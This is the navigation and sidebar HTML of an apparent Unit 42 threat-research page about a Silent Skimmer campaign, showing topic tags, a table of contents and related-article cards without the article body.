				<h3>Tags</h3><ul role="list"><li role="listitem"><a href="https://unit42.paloaltonetworks.com/tag/c/" role="link" title="C++" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:tags:C++">C++</a></li><li role="listitem"><a href="https://unit42.paloaltonetworks.com/tag/cl-cri-0941/" role="link" title="CL-CRI-0941" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:tags:CL-CRI-0941">CL-CRI-0941</a></li><li role="listitem"><a href="https://unit42.paloaltonetworks.com/tag/cve-2017-11317/" role="link" title="CVE-2017-11317" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:tags:CVE-2017-11317">CVE-2017-11317</a></li><li role="listitem"><a href="https://unit42.paloaltonetworks.com/tag/cve-2019-18935/" role="link" title="CVE-2019-18935" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:tags:CVE-2019-18935">CVE-2019-18935</a></li><li role="listitem"><a href="https://unit42.paloaltonetworks.com/tag/godpotato/" role="link" title="GodPotato" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:tags:GodPotato">GodPotato</a></li><li role="listitem"><a href="https://unit42.paloaltonetworks.com/tag/python/" role="link" title="Python" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:tags:Python">Python</a></li><li role="listitem"><a href="https://unit42.paloaltonetworks.com/tag/remote-code-execution/" role="link" title="Remote Code Execution" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:tags:Remote Code Execution">Remote Code Execution</a></li><li role="listitem"><a href="https://unit42.paloaltonetworks.com/tag/reverse-shells/" role="link" title="reverse shells" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:tags:reverse shells">Reverse shells</a></li><li role="listitem"><a href="https://unit42.paloaltonetworks.com/tag/ringq-loader/" role="link" title="RingQ loader" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:tags:RingQ loader">RingQ loader</a></li><li role="listitem"><a href="https://unit42.paloaltonetworks.com/tag/silent-skimmer/" role="link" title="Silent Skimmer" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:tags:Silent Skimmer">Silent Skimmer</a></li><li role="listitem"><a href="https://unit42.paloaltonetworks.com/tag/telerik-ui/" role="link" title="Telerik UI" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:tags:Telerik UI">Telerik UI</a></li></ul>
			</div> 
              <div class="be__post-nav">
    <a class="prev" href="https://unit42.paloaltonetworks.com" role="link" title="Threat Research" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:article-nav:Threat Research Center"> 
        <span>Threat Research Center</span>
    </a>
            <a class="next" href="https://unit42.paloaltonetworks.com/detect-dns-hijacking-passive-dns/" role="link" title="Automatically Detecting DNS Hijacking in Passive DNS" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:article-nav:Automatically Detecting DNS Hijacking in Passive DNS"> 
            <span>Next: Automatically Detecting DNS Hijacking in Passive DNS</span>
        </a>
    </div>
 
            </div>
            <div class="be__nav">
            <div class="be__nav-wrapper">
      <div class="be-table-of-contents" data-toc-track="silent-skimmer-latest-campaign:sidebar:table-of-contents">
      <div class="be-title__wrapper">
        <h3>Table of Contents</h3>
      </div> 
            <ul>
        <li></li>
      <li><a href="#section-1-title" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:sidebar:table-of-contents:Executive Summary">Executive Summary</a></li><li><a href="#section-2-title" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:sidebar:table-of-contents:Observed Activities and TTPs">Observed Activities and TTPs</a><ul><li><a href="#section2SubHeading1" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:sidebar:table-of-contents:Native C++ Code Embedded within .NET Binaries" data-parent="Observed Activities and TTPs">Native C++ Code Embedded within .NET Binaries</a></li><li><a href="#section2SubHeading2" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:sidebar:table-of-contents:RingQ Loader" data-parent="Observed Activities and TTPs">RingQ Loader</a></li><li><a href="#section2SubHeading3" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:sidebar:table-of-contents:Compiled Python - Dumping Payment Information" data-parent="Observed Activities and TTPs">Compiled Python - Dumping Payment Information</a></li><li><a href="#section2SubHeading4" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:sidebar:table-of-contents:Reverse Shells" data-parent="Observed Activities and TTPs">Reverse Shells</a></li></ul></li><li><a href="#section-3-title" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:sidebar:table-of-contents:Attribution and Overlaps">Attribution and Overlaps</a></li><li><a href="#section-4-title" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:sidebar:table-of-contents:Conclusion">Conclusion</a></li><li><a href="#section-5-title" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:sidebar:table-of-contents:Indicators of Compromise">Indicators of Compromise</a></li><li><a href="#section-6-title" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:sidebar:table-of-contents:Additional Resources">Additional Resources</a></li></ul>
    </div>
   
        <div class="be-related-articles">
        <h3>Related Articles</h3>
        <ul> 
                        <li>
                  <a href="https://unit42.paloaltonetworks.com/north-korean-threat-actors-lure-tech-job-seekers-as-fake-recruiters/" role="link" title="article - table of contents" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:sidebar:related-articles:Contagious Interview: DPRK Threat Actors Lure Tech Industry Job Seekers to Install New Variants of BeaverTail and InvisibleFerret Malware">
                      Contagious Interview: DPRK Threat Actors Lure Tech Industry Job Seekers to Install New Variants of BeaverTail and InvisibleFerret Malware                  </a>
              </li>
                            <li>
                  <a href="https://unit42.paloaltonetworks.com/gleaming-pisces-applejeus-poolrat-and-pondrat/" role="link" title="article - table of contents" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:sidebar:related-articles:Gleaming Pisces Poisoned Python Packages Campaign Delivers PondRAT Linux and MacOS Backdoors">
                      Gleaming Pisces Poisoned Python Packages Campaign Delivers PondRAT Linux and MacOS Backdoors                  </a>
              </li>
                            <li>
                  <a href="https://unit42.paloaltonetworks.com/threat-brief-cve-2024-6387-openssh/" role="link" title="article - table of contents" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:sidebar:related-articles:Threat Brief: CVE-2024-6387 OpenSSH RegreSSHion Vulnerability">
                      Threat Brief: CVE-2024-6387 OpenSSH RegreSSHion Vulnerability                  </a>
              </li>
                      </ul>
      </div>
      </div> 
            </div>
          </div>
        </div>
          <div class="pa related-threat">
    <div class="l-container">
            <h2>Related Cybercrime Resources</h2>
      <div class="blog-slider slick-initialized slick-slider" id="blogSlider"> 
                              
                                
                                
                                
                                
                                
                                
                                
                                
                                    <div class="slick-list draggable"><div class="slick-track" style="opacity: 1; width: 6741px; transform: translate3d(-667px, 0px, 0px);"><div class="pa l-card l-card--slider slick-slide slick-cloned" style="width: 301px;" data-slick-index="-3" id="" aria-hidden="true" tabindex="-1">
              <div class="card-media ">
                              <figure>
                <img width="786" height="368" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/03_Malware_Category_1920x900-786x368.jpg" class="lozad" alt="A laptop on a desk displaying a vibrant graphical interface with a circular red pattern, possibly representing cybersecurity or data analysis. The laptop is illuminated by the screen’s glow in a dimly lit room, which also shows a blurred background suggesting a secondary monitor and small desk objects." decoding="async" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/03_Malware_Category_1920x900-786x368.jpg 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/03_Malware_Category_1920x900-1493x700.jpg 1493w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/03_Malware_Category_1920x900-768x360.jpg 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/03_Malware_Category_1920x900-1536x720.jpg 1536w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/03_Malware_Category_1920x900.jpg 1920w" sizes="(max-width: 786px) 100vw, 786px">                </figure> 
                            </div>
              <div class="card-content">
                <div class="card-content__wrapper">
                  <a class="card-category" href="https://unit42.paloaltonetworks.com/category/threat-research/" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Payload Trends in Malicious OneNote Samples:Threat Research" tabindex="-1"><span class=""><img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg" alt=" category icon">Threat Research</span></a>                        <span class="post-pub-date"><time datetime="2024-05-16T10:00:02+00:00">May 16, 2024</time></span>
                  <a href="https://unit42.paloaltonetworks.com/payloads-in-malicious-onenote-samples/" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Payload Trends in Malicious OneNote Samples" tabindex="-1">
                    <h4 class="post-title">Payload Trends in Malicious OneNote Samples</h4>
                  </a>
                  <ul class="card-tags" role="list">
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/malvertising/" title="malvertising" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Payload Trends in Malicious OneNote Samples:malvertising" tabindex="-1">Malvertising</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/microsoft-onenote/" title="Microsoft OneNote" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Payload Trends in Malicious OneNote Samples:Microsoft OneNote" tabindex="-1">Microsoft OneNote</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/phishing/" title="phishing" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Payload Trends in Malicious OneNote Samples:phishing" tabindex="-1">Phishing</a>
				</li></ul>                </div>
                <div class="card-content__link">
                                    <a class="hyperlink" href="https://unit42.paloaltonetworks.com/payloads-in-malicious-onenote-samples/" title="Payload Trends in Malicious OneNote Samples" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Payload Trends in Malicious OneNote Samples:read now" tabindex="-1">
                    Read now                    <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg" alt="Right arrow">
                  </a>
                </div>
              </div>
            </div><div class="pa l-card l-card--slider slick-slide slick-cloned" style="width: 301px;" data-slick-index="-2" id="" aria-hidden="true" tabindex="-1">
              <div class="card-media ">
                              <figure>
                <img width="786" height="393" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/banner-blog-786x393.png" class="lozad" alt="Zoomed in Unit 42 logo." decoding="async" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/banner-blog-786x393.png 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/banner-blog-1400x700.png 1400w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/banner-blog-768x384.png 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/banner-blog-1536x768.png 1536w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/banner-blog.png 2002w" sizes="(max-width: 786px) 100vw, 786px">                </figure> 
                            </div>
              <div class="card-content">
                <div class="card-content__wrapper">
                  <a class="card-category" href="https://unit42.paloaltonetworks.com/category/trend-reports/" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics:Trend Reports" tabindex="-1"><span class=""><img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-report-white-1.svg" alt=" category icon">Trend Reports</span></a>                        <span class="post-pub-date"><time datetime="2024-02-20T14:12:31+00:00">February 20, 2024</time></span>
                  <a href="https://unit42.paloaltonetworks.com/unit42-incident-response-report-2024-threat-guide/" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics" tabindex="-1">
                    <h4 class="post-title">2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics</h4>
                  </a>
                  <ul class="card-tags" role="list">
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/aws/" title="AWS" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics:AWS" tabindex="-1">AWS</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/microsoft-azure/" title="Microsoft Azure" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics:Microsoft Azure" tabindex="-1">Microsoft Azure</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/muddled-libra/" title="Muddled Libra" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics:Muddled Libra" tabindex="-1">Muddled Libra</a>
				</li></ul>                </div>
                <div class="card-content__link">
                                    <a class="hyperlink" href="https://unit42.paloaltonetworks.com/unit42-incident-response-report-2024-threat-guide/" title="2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics:read now" tabindex="-1">
                    Read now                    <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg" alt="Right arrow">
                  </a>
                </div>
              </div>
            </div><div class="pa l-card l-card--slider slick-slide slick-cloned" style="width: 301px;" data-slick-index="-1" id="" aria-hidden="true" tabindex="-1">
              <div class="card-media ">
                              <figure>
                <img width="786" height="368" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/02_Malware_Category_1920x900-786x368.jpg" class="lozad" alt="Close-up view of a digital screen displaying a distorted and pixelated image of a skull-like visage with a strong emphasis on blue and purple tones." decoding="async" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/02_Malware_Category_1920x900-786x368.jpg 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/02_Malware_Category_1920x900-1493x700.jpg 1493w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/02_Malware_Category_1920x900-768x360.jpg 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/02_Malware_Category_1920x900-1536x720.jpg 1536w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/02_Malware_Category_1920x900.jpg 1920w" sizes="(max-width: 786px) 100vw, 786px">                </figure> 
                            </div>
              <div class="card-content">
                <div class="card-content__wrapper">
                  <a class="card-category" href="https://unit42.paloaltonetworks.com/category/threat-research/" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Diving Into Glupteba's UEFI Bootkit:Threat Research" tabindex="-1"><span class=""><img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg" alt=" category icon">Threat Research</span></a>                        <span class="post-pub-date"><time datetime="2024-02-12T14:00:28+00:00">February 12, 2024</time></span>
                  <a href="https://unit42.paloaltonetworks.com/glupteba-malware-uefi-bootkit/" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Diving Into Glupteba's UEFI Bootkit" tabindex="-1">
                    <h4 class="post-title">Diving Into Glupteba's UEFI Bootkit</h4>
                  </a>
                  <ul class="card-tags" role="list">
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/cryptocurrency-mining/" title="Cryptocurrency mining" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Diving Into Glupteba's UEFI Bootkit:Cryptocurrency mining" tabindex="-1">Cryptocurrency mining</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/credential-stealer/" title="credential stealer" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Diving Into Glupteba's UEFI Bootkit:credential stealer" tabindex="-1">Credential stealer</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/redline-infostealer/" title="Redline infostealer" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Diving Into Glupteba's UEFI Bootkit:Redline infostealer" tabindex="-1">Redline infostealer</a>
				</li></ul>                </div>
                <div class="card-content__link">
                                    <a class="hyperlink" href="https://unit42.paloaltonetworks.com/glupteba-malware-uefi-bootkit/" title="Diving Into Glupteba's UEFI Bootkit" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Diving Into Glupteba's UEFI Bootkit:read now" tabindex="-1">
                    Read now                    <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg" alt="Right arrow">
                  </a>
                </div>
              </div>
            </div><div class="pa l-card l-card--slider slick-slide slick-current slick-active" style="width: 301px;" data-slick-index="0" aria-hidden="false" tabindex="0">
              <div class="card-media ">
                              <figure>
                <img width="786" height="368" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/02_DNS_Overview_1920x900-786x368.jpg" class="lozad" alt="Pictorial representation of detecting DNS hijacking. Digital illustration of a futuristic data center with glowing blue server racks connected by light beams, surrounded by cloud computing icons, set against a dark background." decoding="async" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/02_DNS_Overview_1920x900-786x368.jpg 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/02_DNS_Overview_1920x900-1493x700.jpg 1493w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/02_DNS_Overview_1920x900-768x360.jpg 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/02_DNS_Overview_1920x900-1536x720.jpg 1536w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/02_DNS_Overview_1920x900.jpg 1920w" sizes="(max-width: 786px) 100vw, 786px">                </figure> 
                            </div>
              <div class="card-content">
                <div class="card-content__wrapper">
                  <a class="card-category" href="https://unit42.paloaltonetworks.com/category/threat-research/" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Automatically Detecting DNS Hijacking in Passive DNS:Threat Research" tabindex="0"><span class=""><img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg" alt=" category icon">Threat Research</span></a>                        <span class="post-pub-date"><time datetime="2024-11-04T23:00:48+00:00">November 4, 2024</time></span>
                  <a href="https://unit42.paloaltonetworks.com/detect-dns-hijacking-passive-dns/" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Automatically Detecting DNS Hijacking in Passive DNS" tabindex="0">
                    <h4 class="post-title">Automatically Detecting DNS Hijacking in Passive DNS</h4>
                  </a>
                  <ul class="card-tags" role="list">
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/domain-hijacking/" title="domain hijacking" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Automatically Detecting DNS Hijacking in Passive DNS:domain hijacking" tabindex="0">Domain hijacking</a>
				</li></ul>                </div>
                <div class="card-content__link">
                                    <a class="hyperlink" href="https://unit42.paloaltonetworks.com/detect-dns-hijacking-passive-dns/" title="Automatically Detecting DNS Hijacking in Passive DNS" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Automatically Detecting DNS Hijacking in Passive DNS:read now" tabindex="0">
                    Read now                    <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg" alt="Right arrow">
                  </a>
                </div>
              </div>
            </div><div class="pa l-card l-card--slider slick-slide slick-active" style="width: 301px;" data-slick-index="1" aria-hidden="false" tabindex="0">
              <div class="card-media ">
                              <figure>
                <img width="786" height="368" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/06_Ransomware_Category_1920x900-786x368.jpg" class="lozad" alt="A pictorial representation of Cicada3301 ransomware. Digital rendering of a transparent padlock superimposed with programming code and placed on a network of connected databases, symbolizing cybersecurity and data protection." decoding="async" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/06_Ransomware_Category_1920x900-786x368.jpg 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/06_Ransomware_Category_1920x900-1493x700.jpg 1493w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/06_Ransomware_Category_1920x900-768x360.jpg 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/06_Ransomware_Category_1920x900-1536x720.jpg 1536w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/06_Ransomware_Category_1920x900.jpg 1920w" sizes="(max-width: 786px) 100vw, 786px">                </figure> 
                            </div>
              <div class="card-content">
                <div class="card-content__wrapper">
                  <a class="card-category" href="https://unit42.paloaltonetworks.com/category/top-cyberthreats/" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: Repellent Scorpius, Distributors of Cicada3301 Ransomware:High Profile Threats" tabindex="0"><span class=""><img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg" alt=" category icon">High Profile Threats</span></a>                        <span class="post-pub-date"><time datetime="2024-09-10T10:00:08+00:00">September 10, 2024</time></span>
                  <a href="https://unit42.paloaltonetworks.com/repellent-scorpius-cicada3301-ransomware/" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: Repellent Scorpius, Distributors of Cicada3301 Ransomware" tabindex="0">
                    <h4 class="post-title">Threat Assessment: Repellent Scorpius, Distributors of Cicada3301 Ransomware</h4>
                  </a>
                  <ul class="card-tags" role="list">
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/raas/" title="RaaS" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: Repellent Scorpius, Distributors of Cicada3301 Ransomware:RaaS" tabindex="0">RaaS</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/data-exfiltration/" title="data exfiltration" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: Repellent Scorpius, Distributors of Cicada3301 Ransomware:data exfiltration" tabindex="0">Data exfiltration</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/leak-site/" title="Leak site" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: Repellent Scorpius, Distributors of Cicada3301 Ransomware:Leak site" tabindex="0">Leak site</a>
				</li></ul>                </div>
                <div class="card-content__link">
                                    <a class="hyperlink" href="https://unit42.paloaltonetworks.com/repellent-scorpius-cicada3301-ransomware/" title="Threat Assessment: Repellent Scorpius, Distributors of Cicada3301 Ransomware" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: Repellent Scorpius, Distributors of Cicada3301 Ransomware:read now" tabindex="0">
                    Read now                    <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg" alt="Right arrow">
                  </a>
                </div>
              </div>
            </div><div class="pa l-card l-card--slider slick-slide" style="width: 301px;" data-slick-index="2" aria-hidden="true" tabindex="0">
              <div class="card-media ">
                              <figure>
                <img width="786" height="368" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/Pisces-NK-A-1920x900-1-786x368.png" class="lozad" alt="Illustrative image featuring two fish and the Pisces constellation superimposed on a stylized, abstract background with flowing purple waves and a starry night sky." decoding="async" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/Pisces-NK-A-1920x900-1-786x368.png 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/Pisces-NK-A-1920x900-1-1493x700.png 1493w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/Pisces-NK-A-1920x900-1-768x360.png 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/Pisces-NK-A-1920x900-1-1536x720.png 1536w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/Pisces-NK-A-1920x900-1.png 1920w" sizes="(max-width: 786px) 100vw, 786px">                </figure> 
                            </div>
              <div class="card-content">
                <div class="card-content__wrapper">
                  <a class="card-category" href="https://unit42.paloaltonetworks.com/category/top-cyberthreats/" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: North Korean Threat Groups:High Profile Threats" tabindex="-1"><span class=""><img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg" alt=" category icon">High Profile Threats</span></a>                        <span class="post-pub-date"><time datetime="2024-09-09T22:00:58+00:00">September 9, 2024</time></span>
                  <a href="https://unit42.paloaltonetworks.com/threat-assessment-north-korean-threat-groups-2024/" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: North Korean Threat Groups" tabindex="-1">
                    <h4 class="post-title">Threat Assessment: North Korean Threat Groups</h4>
                  </a>
                  <ul class="card-tags" role="list">
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/north-korea/" title="North Korea" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: North Korean Threat Groups:North Korea" tabindex="-1">North Korea</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/remote-access-trojan/" title="Remote Access Trojan" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: North Korean Threat Groups:Remote Access Trojan" tabindex="-1">Remote Access Trojan</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/finance/" title="Finance" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: North Korean Threat Groups:Finance" tabindex="-1">Finance</a>
				</li></ul>                </div>
                <div class="card-content__link">
                                    <a class="hyperlink" href="https://unit42.paloaltonetworks.com/threat-assessment-north-korean-threat-groups-2024/" title="Threat Assessment: North Korean Threat Groups" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: North Korean Threat Groups:read now" tabindex="-1">
                    Read now                    <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg" alt="Right arrow">
                  </a>
                </div>
              </div>
            </div><div class="pa l-card l-card--slider slick-slide" style="width: 301px;" data-slick-index="3" aria-hidden="true" tabindex="-1">
              <div class="card-media ">
                              <figure>
                <img width="786" height="368" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/03_Ransomware_Category_1920x900-786x368.jpg" class="lozad" alt="Pictorial representation of ransomware activity in the first half of 2024. A digitial illustration of a lock made up of nodes glowing against a background of bokeh points." decoding="async" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/03_Ransomware_Category_1920x900-786x368.jpg 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/03_Ransomware_Category_1920x900-1493x700.jpg 1493w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/03_Ransomware_Category_1920x900-768x360.jpg 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/03_Ransomware_Category_1920x900-1536x720.jpg 1536w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/03_Ransomware_Category_1920x900.jpg 1920w" sizes="(max-width: 786px) 100vw, 786px">                </figure> 
                            </div>
              <div class="card-content">
                <div class="card-content__wrapper">
                  <a class="card-category" href="https://unit42.paloaltonetworks.com/category/trend-reports/" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Ransomware Review: First Half of 2024:Trend Reports" tabindex="-1"><span class=""><img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-report-white-1.svg" alt=" category icon">Trend Reports</span></a>                        <span class="post-pub-date"><time datetime="2024-08-09T10:00:03+00:00">August 9, 2024</time></span>
                  <a href="https://unit42.paloaltonetworks.com/unit-42-ransomware-leak-site-data-analysis/" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Ransomware Review: First Half of 2024" tabindex="-1">
                    <h4 class="post-title">Ransomware Review: First Half of 2024</h4>
                  </a>
                  <ul class="card-tags" role="list">
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/healthcare/" title="Healthcare" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Ransomware Review: First Half of 2024:Healthcare" tabindex="-1">Healthcare</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/lockbit/" title="LockBit" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Ransomware Review: First Half of 2024:LockBit" tabindex="-1">LockBit</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/ransomhub/" title="RansomHub" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Ransomware Review: First Half of 2024:RansomHub" tabindex="-1">RansomHub</a>
				</li></ul>                </div>
                <div class="card-content__link">
                                    <a class="hyperlink" href="https://unit42.paloaltonetworks.com/unit-42-ransomware-leak-site-data-analysis/" title="Ransomware Review: First Half of 2024" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Ransomware Review: First Half of 2024:read now" tabindex="-1">
                    Read now                    <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg" alt="Right arrow">
                  </a>
                </div>
